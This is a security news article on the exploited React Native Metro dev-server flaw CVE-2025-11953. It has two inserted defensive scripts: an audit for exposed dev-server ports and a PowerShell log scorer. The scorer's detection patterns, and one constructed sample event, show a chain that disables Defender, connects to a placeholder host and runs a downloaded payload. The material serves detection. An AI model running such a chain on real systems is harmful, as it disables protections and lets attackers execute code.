Threat actors have been exploiting a critical-severity React Native vulnerability in attacks since late December, VulnCheck warns.
Tracked as CVE-2025-11953 (CVSS score of 9.8) and disclosed in early November, the bug impacts the highly popular React Native Community CLI NPM package (@react-native-community/cli), which has roughly two million weekly downloads.
It is part of the React Native Community CLI project, which was extracted from the open source framework for improved maintainability, and provides a set of command-line tools for app building.
While CVE-2025-11953 and other vulnerabilities impacting development servers are typically exploitable only from the developer’s local machine, a second issue in React Native exposes the servers to external attackers, software supply chain security firm JFrog warned in November.
Now, VulnCheck mirrors the warning after observing in-the-wild exploitation of the CVE, despite limited public attention.
“As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared,” VulnCheck notes in a fresh report.
The vulnerability intelligence firm, which has named the bug Metro4Shell, observed initial exploitation attempts on December 21, followed by more activity on January 4 and 21, suggesting continuous operational use. Thousands of internet-accessible React Native instances could be at risk.
“This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet,” VulnCheck says.
According to the company, the Metro4Shell React Native vulnerability resides within Metro, the JavaScript bundler and development server that React Native apps use in the development and testing stages.
By default, Metro can bind to external interfaces, exposing deployments to unauthenticated, remote OS command execution via simple POST requests.
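The exposure the article describes is a development server listening on a network-facing address rather than loopback. The following audit script is an added example (not code from the article, VulnCheck, or the React Native project): it parses `ss -ltn` output and flags listeners on dev-server ports that are reachable from other hosts. The port set (Metro's default 8081, plus 8082 as an alternate), the `ss` column layout, and the sample output embedded below are assumptions and constructed data.

```python
"""
Audit TCP listeners for a React Native / Metro dev server bound to a
non-loopback interface.  Added example, not from the article or the
React Native project; the port list and `ss -ltn` column layout are
assumptions, and SAMPLE_SS_OUTPUT is constructed.
"""
import ipaddress
import subprocess

# Metro's default dev-server port is 8081; 8082 is included as a commonly
# used alternate (assumption, not stated in the article).
DEV_SERVER_PORTS = {8081, 8082}

# Constructed sample of `ss -ltn` output for offline use.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       511     127.0.0.1:5432       0.0.0.0:*
LISTEN  0       511     0.0.0.0:8081         0.0.0.0:*
LISTEN  0       511     [::]:8082            [::]:*
LISTEN  0       128     [::1]:8081           [::]:*
"""


def split_addr_port(field: str):
    """Split an ss 'Local Address:Port' field into (ip, port).

    Handles bracketed IPv6 ('[::]:8082') and plain IPv4 ('0.0.0.0:8081').
    Returns None when the port is not numeric (e.g. '*').
    """
    host, _, port = field.rpartition(":")
    host = host.strip("[]")
    if not port.isdigit():
        return None
    return host, int(port)


def is_externally_bound(ip: str) -> bool:
    """True when the bind address accepts connections from other hosts.

    Loopback (127.0.0.0/8, ::1) is local-only; the wildcards 0.0.0.0 and ::
    and any specific non-loopback address are reachable from the network.
    """
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not addr.is_loopback


def find_exposed_dev_servers(ss_output: str, ports=DEV_SERVER_PORTS):
    """Return [(ip, port)] for LISTEN sockets on dev-server ports that are
    not bound to loopback."""
    exposed = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        parsed = split_addr_port(fields[3])
        if parsed is None:
            continue
        ip, port = parsed
        if port in ports and is_externally_bound(ip):
            exposed.append((ip, port))
    return exposed


def audit_local_host(ports=DEV_SERVER_PORTS):
    """Run `ss -ltn` on this machine and return exposed dev-server listeners."""
    out = subprocess.run(["ss", "-ltn"], capture_output=True,
                         text=True, check=True).stdout
    return find_exposed_dev_servers(out, ports)


if __name__ == "__main__":
    for ip, port in find_exposed_dev_servers(SAMPLE_SS_OUTPUT):
        print(f"dev server on {ip}:{port} is reachable from the network")
```

Run `audit_local_host()` on a developer workstation or build box to get the live result; the sample output exercises the three cases that matter (IPv4 wildcard, IPv6 wildcard, and a loopback-only listener that is correctly ignored). A listener on 0.0.0.0 or :: is the condition the article calls out, and the fix is to bind the dev server to loopback or put it behind host-based firewalling.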
VulnCheck observed the attackers deploying a multi-stage PowerShell-based loader designed to disable Microsoft Defender protections, establish a raw TCP connection to the attackers’ host, send a GET request and receive a payload, and execute the downloaded payload.
“This same methodology was observed across multiple attacks. The deliberate disabling of Microsoft Defender protections before payload retrieval indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow,” VulnCheck notes.
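The sequence above (Defender tampering, then a raw TCP fetch, then execution) is a pattern that can be scored in PowerShell script-block logs. The triage routine below is an added example, not code from the article or from VulnCheck's report: it matches a small indicator list against the text of constructed Event ID 4104-style events and alerts when the combined weight crosses a threshold. The cmdlet and .NET class names are real identifiers; which of them the observed loader actually used is not stated in the article, so the indicator list, weights, threshold, and sample events are assumptions.

```python
"""
Score PowerShell script-block log text for the chain the article describes
(Defender disabled, raw TCP download, execution).  Added example, not from
the article or VulnCheck; indicator list, weights, threshold and the
SAMPLE_EVENTS below are assumptions / constructed data.
"""
import re

# (name, pattern, weight).  Set-MpPreference / Add-MpPreference are the real
# Defender configuration cmdlets; System.Net.Sockets.TcpClient is the .NET
# class behind a raw TCP connection.  Weights are an assumption.
INDICATORS = [
    ("defender_disable",
     re.compile(r"Set-MpPreference\b[^\n]*-Disable\w+\s+(\$true|1)\b", re.I), 3),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b[^\n]*-Exclusion(Path|Process|Extension)\b", re.I), 2),
    ("raw_tcp_client",
     re.compile(r"System\.Net\.Sockets\.TcpClient\b", re.I), 2),
    ("invoke_expression",
     re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 1),
]

# A single exclusion (weight 2) is common admin activity; tampering plus a
# raw socket (3 + 2) is what we want to surface.  Threshold is an assumption.
ALERT_THRESHOLD = 4

# Constructed sample events: only the fields this example needs.
SAMPLE_EVENTS = [
    {"id": "evt-1", "host": "dev-laptop-01",
     "script": "Get-ChildItem -Path . -Recurse | Measure-Object"},
    {"id": "evt-2", "host": "dev-laptop-02",
     "script": ("Set-MpPreference -DisableRealtimeMonitoring $true\n"
                "$c = New-Object System.Net.Sockets.TcpClient('<placeholder-host>', 80)\n"
                "Invoke-Expression $payload")},
    {"id": "evt-3", "host": "build-01",
     "script": "Add-MpPreference -ExclusionPath 'C:\\build\\cache'"},
]


def score_script(script: str):
    """Return (matched indicator names, total weight) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(script)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return hits, score


def triage(events, threshold=ALERT_THRESHOLD):
    """Return alert records for events whose indicator score meets the threshold."""
    alerts = []
    for ev in events:
        hits, score = score_script(ev["script"])
        if score >= threshold:
            alerts.append({"id": ev["id"], "host": ev["host"],
                           "score": score, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['id']}: score={alert['score']} "
              f"indicators={','.join(alert['indicators'])}")
```

Script-block logging (Event ID 4104) must be enabled for this to see anything; the point of weighting rather than matching a single string is that `Add-MpPreference -ExclusionPath` alone is routine on build hosts, while Defender tampering followed in the same block by a raw socket is the combination the article attributes to the loader.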
The final payload is written in Rust and includes basic anti-analysis logic. VulnCheck has observed payloads targeting both Windows and Linux systems.
“CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent,” VulnCheck notes.